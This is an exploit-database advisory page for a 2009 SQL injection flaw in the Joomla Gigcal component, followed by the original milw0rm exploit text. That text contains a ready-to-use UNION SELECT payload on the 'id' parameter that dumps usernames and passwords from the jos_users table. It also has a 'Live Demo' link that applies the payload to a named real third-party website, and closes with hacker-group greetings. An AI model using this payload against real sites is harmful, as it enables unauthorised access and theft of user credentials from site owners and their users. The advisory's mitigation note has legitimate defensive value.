Joomla Component Gigcal SQL Injection Vulnerability

vendor:

Joomla Component Gigcal

by:

Lanti-Net

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Component Gigcal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component Gigcal SQL Injection Vulnerability

An SQL injection vulnerability in the Joomla component Gigcal allows remote attackers to execute arbitrary SQL commands via the id parameter in a view action to index.php.

Mitigation:

Upgrade to the latest version of Joomla component Gigcal or apply the patch.

Source

Exploit-DB raw data:

*****************************************************************************
* 					 	                            *
*           Joomla Component Gigcal SQL Injection Vulnerability             *
*                           						    *
*****************************************************************************

***************************************
[=] Vulnerability found by: Lanti-Net
[=] Contact: lanti-net[at]hotmail[dot]com
[=] Site: www.khg-crew.ws
[=] Greetz: boom3rang, KHG, urtan, H!tm@N , war_ning, chs, redc00de , SpYrO
[=]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-
***************************************
[=] Exploit  : /index.php?option=com_gigcal&Itemid=78&id={SQL}
[=] Example  : /index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
[=] Live Demo: http://www.fermaten.dk/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
***************************************
[=] Proud 2 be Albanian
[=] Proud 2 be Muslim
[=] United States of Albania
***************************************

# milw0rm.com [2009-01-18]